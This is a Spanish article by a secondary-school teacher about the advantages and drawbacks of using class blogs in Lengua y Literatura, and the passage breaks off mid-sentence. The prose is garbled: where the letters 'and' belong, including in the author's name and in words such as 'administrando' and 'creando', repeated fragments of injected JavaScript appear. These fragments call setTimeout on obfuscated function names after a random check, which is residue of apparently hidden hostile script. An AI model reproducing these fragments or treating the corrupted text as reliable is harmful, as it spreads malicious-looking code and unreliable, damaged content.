EL BLOG EN EL AULA: Experiencias, Ventajas e Inconvenientes

Autora: Sandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andra Martínez Martín

Este artículo pretende reunir las ventajas e inconvenientes de la herramienta del blog como elemento didáctico en el aula con el fin de facilitar la tarea educativa del docente y permitir al alumno interactuar con la asignatura de una forma más amena y atractiva. El artículo está basado en experiencias reales tras tres cursos lectivos donde se ha empleado el blog como herramienta TIC para el estudio y trabajo de la materia de Lengua castellana y Literatura.

EL BLOG EN EL AULA: EXPERIENCIAS. VENTAJAS E INCONVENIENTES.

Durante el primer curso creé un blog educativo con la intención de trabajar los contenidos de la asignatura de Lengua y Literatura orientada al nivel de 3º de la ESO. Durante los primeros días de clase anuncié la creación de este blog en los niveles de 1º, 2º y 3º pero finalmente me incliné por los de 3º pues mostraron un mayor interés y curiosidad por el empleo de esta herramienta hasta el momento desconocida para ellos. Insistieron bastante en que rápidamente empleáramos los ordenadores en el aula. Otro de los motivos por los que tomé dicha decisión fue que los alumnos de 2º y 1º manifestaban una conducta más negativa en cuanto al cuidado de los materiales (maltrataban bastante los ordenadores, teclados y ratones).

Para involucrar aún más a los alumnos, les indiqué los pasos necesarios para crear un blog en Blogspot.com con el objetivo de que alguno de ellos se animara en el futuro a utilizar esta herramienta de forma individual (no me consta que esto haya ocurrido finalmente).

Durante todo el curso yo fui administrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el blog y creandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las entradas, introduciendo imágenes, enlaces, etc. Solo utilicé el blog como una herramienta complementaria a los contenidos curriculares de la asignatura y nunca al contrario, es decir, el blog debía servir para perfeccionar algún contenido o trabajarlo de una forma más amena. En ningún caso considero que el blog pueda sustituir la explicación oral del docente.

Los alumnos se mostraron durante todo el curso entusiasmados con la idea de trabajar a través del blog aunque muy pocos se atrevieron a verter sus comentarios. Pude deducir después de conocer bien a mis alumnos que esto venía motivado por su timidez (hecho extraño teniendo en cuenta que todos ellos manejan a la perfección Tuenti y demás redes sociales).

Después de la grata experiencia de este primer curso, en octubre de 2009 iniciamos otro en WordPress para el nivel de 4º de la ESO. Este nuevo blog nace de un proyecto que titulé Proyecto Méntor: un grupo de trabajo del que soy coordinadora en el CPR de Almendralejo con el fin de formar a algunos compañeros en el uso de los blogs.

Muchos de los alumnos que utilizaron el blog en 3º estaban dentro de este nuevo grupo y la idea de volver a hacer un nuevo blog les entusiasmó y este sentimiento contagió al resto. Al principio tuve que orientarles y describir los usos del blog y la intención que tenía dentro del aula. Este año lo he orientado más a la inmersión de otras herramientas que poco a poco he ido creandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando: diapositivas, HotPotatoes, páginas web…

Cómo trabajan los alumnos con el blog (ventajas e inconvenientes):

Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}